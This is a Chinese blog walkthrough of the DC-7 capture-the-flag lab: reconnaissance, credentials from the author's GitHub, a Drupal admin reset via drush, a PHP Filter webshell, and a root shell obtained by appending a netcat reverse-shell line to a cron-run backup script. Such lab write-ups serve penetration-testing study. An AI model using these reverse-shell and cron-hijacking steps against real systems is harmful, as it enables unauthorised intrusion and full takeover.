DC-7是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。
本篇文档中用到了exim4漏洞提权和shell二次反弹。

环境搭建


攻击机kali2021,网络环境NAT

信息收集


主机发现

arp-scan -l
192.168.207.141是靶机的ip地址。

端口探测

nmap
由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。

访问web

dc-7
从web首页的这段话来看渗透的路子在左边的那个搜索框上,随便输点什么查询下,都没有找到什么有用的信息,下面是这段话的翻译

DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。:-)

虽然这个挑战并不完全是技术性的,但如果你需要使用暴力破解或字典攻击,你可能不会成功。(说明暴力破解登录用户或字典检索网站目录还是有可能操作的)

你要做的,就是跳出框框去思考。

在盒子外面。:-)

信息收集

在尝试许多方法无果后,在网站左下角找到@DC7USER作者的推特,在推特找到dc-7的github相关信息,在config.php找到一些可能有用的信息。
config.php
尝试登陆网站后台,不行,尝试登陆ssh
登陆成功
backups下两个gpg加密文件
backups
查看另外一个mbox邮件,应该是一个周期执行任务。
mbox
其中的主要信息有:
Shell脚本文件 /opt/scripts/backups.sh
数据库文件:/home/dc7user/backups/website.sql
网站数据: /home/dc7user/backups/website.tar.gz
从目前情况来看,website.sql和website.tar.gz文件现在都是加密过的,现在只能把目光放在另一个文件backups.sh上
查看文件如下
backups.sh

漏洞利用

查询drush是drupal shell专门管理drupal站点的shell,使用drush扫描得知drupal用户为admin,cms的管理用户
尝试重置admin用户密码,说明admin用户存在
drush
web后台登陆成功
admin/123
到后台后想上传一句话木马进行连接,发现没有php模块,这样就没办法解析php,在extra中点击添加php模块
安装成功
启用PHP Filter
点击下面的install

反弹shell

添加一句话木马,反弹shell
nc反弹shell
连接成功
连接成功
优化登陆状态

python -c "import pty;pty.spawn('/bin/bash')"  #显示hostname和路径
alias ls='ls --color'  #为文件添加区分颜色

提权


echo 'nc 192.168.207.129 2234 -e /bin/sh' >> /opt/scripts/backups.sh

反弹root的shell。
反弹成功
theflag

总结


dc系列提权大同小异,关键在于发现漏洞的眼睛

最后修改:2021 年 08 月 12 日 10 : 47 PM
如果觉得我的文章对你有用,请随意赞赏